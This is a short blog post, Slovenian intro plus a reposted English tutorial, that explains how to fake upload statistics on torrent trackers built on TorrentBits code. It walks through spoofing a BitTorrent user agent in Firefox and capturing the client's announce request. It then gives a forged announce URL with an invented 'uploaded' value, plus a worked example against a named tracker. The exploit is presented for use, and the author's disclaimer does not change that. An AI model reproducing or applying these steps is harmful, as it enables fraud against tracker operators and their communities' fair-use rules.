brumec.org

Smer: Gor!

Večina novejših torrent trackerjev podpira ratio (razmerje) in na principu downloada/uploada ločuje seme od plev oz. seederje od leecherjev. Pred kratkim pa so se na netu pojavila hitra navodila, kako ponagajati takemu sistemu s pomočjo Firefoxa in še nekaterih dodatkov. Kljub temu da takega početja ne podpiram, vseeno objavljam (angleška) navodila. Morda le ugotovijo, da je pravi p2p v open trackerjih.
How-To: Increase your upload/download/ratio in torrent trackers

The “vulnerability” has been tested on the torrent trackers that use the torrentbits source code (I don’t know if it works on other trackers).
The idea of this this vulnerability is that you will sniff your torrent info using the HTTP Analyzer and with Firefox you will update your stats to the tracker being identified as a client. This is a simple and short tutorial that shows you how to do it, if you are "more" advanced you can use other tools to do it.

Programs that you need:
– HTTP Analyzer – http://www.ieinspector.com/httpanalyzer/
– Mozilla Firefox – http://www.mozilla.org/products/firefox/
– User Agent Switcher Extension – http://chrispederick.com/work/firefox/useragentswitcher/
– And an bittorrent client.

Steps:

1. Install the User Agent Switcher Extension (the extension will be used to identify as a bittorrent client to the tracker) to Mozilla Firefox (if you don’t have Firefox, get it!).
2. After installing the extension go in Firefox to:

Tools -> User Agent Switcher -> Options -> Options -> User Agents

Click Add, write “BitTorrent/3.4.2” to the Description and User Agent and then press "Ok".

3. Then go to:

Tools -> User Agent Switcher and select the newly added User Agent, “BitTorrent/3.4.2”.

4. Install HTTP Analyzer.
5. Get a .torrent file from a tracker that uses the torrentbits source code and add it to your client. (DO NOT START IT)
6. Start HTTP Analyzer and go to the "Start Logging" button, select "Select a process…", choose your bittorrent client (Important: If you use Azureus, select the javaw.exe proccess from the list) from the list and click "Ok".

7. Go into your client and start the torrent.
8. Now go into HTTP Analyzer, there you should see a GET request to the tracker.

Example:

GET /torrents/announce.php?info_hash=%B5%2D%F4%ADM%18%7C%83C%E9%EC%C8%C7%F7%973%3Fap%15&peer_id=%2DBC0059%2Dp%D1%FBd%D0%C6%EC%7B%B4%D5q%B8&port=12345&uploaded=0&downloaded=0&left=0&numwant=200&compact=1&no_peer_id=1&key=9427&event=started HTTP/1.0

9. Open Firefox, paste into the address bar:

http://TRACKER.ADDRESS/announce.php?info_hash=INFOHASH&peer_id=PEERID&port=PORT&uploaded=UPLOADED&downloaded=0&left=0&numwant=0&event=completed

replace:

TRACKER.ADDRESS with the torrent tracker address (ex: www.filelist.org:81)
INFOHASH with info_hash variable taken from the GET request from HTTP Analyzer,
PEERID with the peer_id
PORT with the port
UPLOADED with an number that you want, in bytes (ex: 10737418240 for 10GB)

Example:

http://www.filemp3.org:81/announce.php?info_hash=%B5%2D%F4%ADM%18%7C%83C%E9%EC%C8%C7%F7%973%3Fap%15&peer_id=%2DBC0059%2D%C3F%A4c%C4%0D%D35i%93%93%EA&port=12345&uploaded=10737418240&downloaded=0&left=0&numwant=0&event=completed

press enter and then stop the torrent in your client.

Now you should have 10GB added to your upload.

FileMP3 screens :D

The vulnerability should work on all sites that use the TorrentBits source code (including filelist.org, torrentbytes.net and anothers). If you have any questions please post a comment.
Posted by xyflar.